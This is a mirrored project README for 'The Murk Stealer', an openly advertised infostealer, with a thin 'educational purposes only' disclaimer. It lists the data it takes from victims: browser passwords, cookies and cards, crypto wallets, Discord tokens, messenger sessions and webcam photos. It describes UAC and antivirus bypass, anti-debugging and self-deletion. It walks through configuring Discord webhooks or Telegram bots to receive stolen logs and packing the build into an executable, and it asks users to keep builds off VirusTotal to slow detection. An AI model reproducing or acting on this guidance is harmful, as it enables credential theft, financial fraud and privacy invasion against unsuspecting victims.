The Murk Stealer Save Abandoned

🔐Powerful multi-platform stealer with a huge pack of grabbed data. Wallets stealer, browsers stealer, sessions stealer, etc

Project README

LOGO

🔐Powerful multi-platform stealer with a huge pack of grabbed data. Wallets stealer, browsers stealer, sessions stealer, etc. All logs will be sent using discord webhooks or telegram bot. Download the latest release

⭐Please, star this repo if it was helpful⭐


⛔Disclaimer⛔

I, the creator, am NOT responsible for any actions, and or damages, caused by this software. You BEAR the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.


❗❗Request❗❗

Don't upload builded stealer to Virustotal. The more often you upload it, the more and faster antiviruses begin to recognize its signature.


❕❕Data grubed❕❕

  • ✅System info
    • ❗Main
      • ⏲Time
      • ⌚Timezone
      • 🏙City
      • 🏙Region
      • 🗺Country
      • 👤Username
      • 🖥PC Name
      • 💻OS
      • 💻OS Version
      • ⚙Architecture
      • 🔧HWID
      • 🔧MAC
      • 🛠BIOS Serial Number
      • 🛠Machine GUID
      • 🛠BaseBoard Manufacturer
    • 🌐Network
      • 📡External IP
      • 📡Internal IP
      • 🌍Coordinates
      • 🏬Organization
      • 📯Postal
    • 🔩CPU
      • 📜CPU model
      • 📜Cores
      • 📜CPU frequency
    • 🎥GPU
      • 🔩GPU model
      • 💾All memory in the GPU
      • 💾Free memory in the GPU
      • 💾Used memory in the GPU
      • 📜GPU temperature
    • 💽RAM
      • 💾All RAM
      • 💾Available
      • 💾Used
    • 💽DRIVES
      • 📜volumes
      • 💾All Memory
      • 💾Available
      • 💾Used
      • 📜File system type
    • 🧮OTHER
      • 🧪Antiviruses
      • 📠Processes
      • 📄Clipboard
      • 📱Programs
      • 🔑Product key
      • 📡Wifi
      • 🗂FileZilla
  • ✅Files .txt, .docx, etc
    • 📝in Desktop
    • 📝in Documents
    • 📝in Downloads
  • 🪁Messagers
    • 📢Telegram sessions
    • 📢Viber sessions
    • 📢Pidgin sessions
    • 📢Discord sessions + token-grabber
    • 📢Skype sessions
    • 📢WhatsApp sessions
    • 📢And more
  • ⚔Game
    • ♠Steam
    • ♠Epic Games
    • ♠Uplay
    • ♠Roblox
    • ♠Minecraft
    • ♠BattleNET
    • ♠And more
  • 💳Wallets
    • 💵PayPal
    • 💵Kivi
    • 💵Gpay
    • 📈Binance
    • 📈Metamask
    • 📈Atomic
    • 📈Exodus
    • 💵And more
  • 🌐Browsers
    • 🔗Chrome
      • 🔑Passwords
      • 🔐Cookies
      • 📝History
      • 📥Downloads
      • 🧩Extensions
      • 🖋Autofills
      • 💳Cards
    • 🔗Firefox
      • 🔑Passwords
      • 🔐Cookies
      • 📝History
      • 📥Downloads
      • 🧩Extensions
      • 🖋Autofills
      • 💳Cards
    • 🔗Opera
      • 🔑Passwords
      • 🔐Cookies
      • 📝History
      • 📥Downloads
      • 🧩Extensions
      • 🖋Autofills
      • 💳Cards
    • 🔗Edge
      • 🔑Passwords
      • 🔐Cookies
      • 📝History
      • 📥Downloads
      • 🧩Extensions
      • 🖋Autofills
      • 💳Cards
    • 🔗Brave
      • 🔑Passwords
      • 🔐Cookies
      • 📝History
      • 📥Downloads
      • 🧩Extensions
      • 🖋Autofills
      • 💳Cards
    • 🔗And more
  • 📡VPN
    • ⛓Nord VPN
    • ⛓Open VPN
    • ⛓Proton VPN
    • ⛓And more
  • 📚Other
    • 📸Sreenshot
    • 📸Camera photo
    • 🗃File grabber
    • 🛡Anti-debug
    • 🔌uac bypass
    • 💉AV bypass
    • 🎭Self destruction

🔨Building(manually)

Configuring

Foremost, download the source code. Then go to The Murk\preferences dir and open config.py in any text editor. There you'll see some vars, here is an explanation of them:

  • enableFileGrabber

If you set this var as True, all files with extensions .txt; .docx; .csv; .xls; .png; .jpg will be collected from the computer and sent to you

  • oneStart

If you set this var as True, the application will be able to run only once on the same pc

  • id

write here any integer, this var'll be used to check oneStart

  • avbypass

If you set this var as True, the application will automatically add itself to the whitelist of AV and make a copy of itself in case of deleting

  • selfDestruct

If you set this var as True, the application will automatically delete itself after completing

  • directSend

If you set this var as True, the application will send the file directly to you through the selected messager without uploading to the file transfer cloud, but direct sending doesn't allow large sizes

  • debuging

disables AntiDebug (don't change if you don't know what it is responsible for)

  • pathToLogs

the path that will be stored logs before sending, the path from user dir. Should start with \\ and \\ should be between dirs names

Now let's figure out how to fill out the fields of sendData.

For Discord(same for builder)

So firstly, create your Discord server and webhook there. How to do it. Then, insert the webhook link in a separate field as in example [0, "url of your WebHook", "null"].

For Telegram(same for builder)

So firstly, go to the @BotFather bot and create your own bot, copy HTTP API of bot. Now you need to get your chat id. To do this, go to the next bot @ShowJsonBot and copy the id too. Then, insert the HTTP API and the id in separate fields as in example [1, "HTTP API", "chat ID"], don't forget to change the first var from 0 to 1.

Packing

Finally, to let all this deal work you need to download python. Then open cmd in the main project dir insert in the console pip install -r requirements.txt, and wait till all downloads are completed. To pack all of it into an exe file just run pack.bat, and wait till the end of packing. The exe file gonna be placed in the dist folder.


❌Builder errors

If you have error like this:

error

How to solve it read here


🧾Results(logs)

Example of message in Discord

LOGO

LOGO


BTC: bc1qfe46xsewu00yhl0llzaxhz9re03y4al0w9p3v2

ETH: 0xeeA063838950D191881EdF0E31b4699B73aD20Ac

XMR: 48jeXS4GGpEJ2Kswn3zRXc3wBqK2s9ojJEohE47KW9ZMPdtnCGTTJGjc7iQpNWSrmmZCCLsj4WDNVa88Mb6kTeJhJWbtbmo

USDT(ethereum network): 0xeeA063838950D191881EdF0E31b4699B73aD20Ac

LTC: LWyarn3cnVyVahgjDpr4uokCFQbq39KDuc


📲Contacts

open issues, pull requests or discussions

or

Our Discord server join us


go up

Open Source Agenda is not affiliated with "The Murk Stealer" Project. README Source: Nick-Vinesmoke/The-Murk-stealer

Open Source Agenda Badge

Open Source Agenda Rating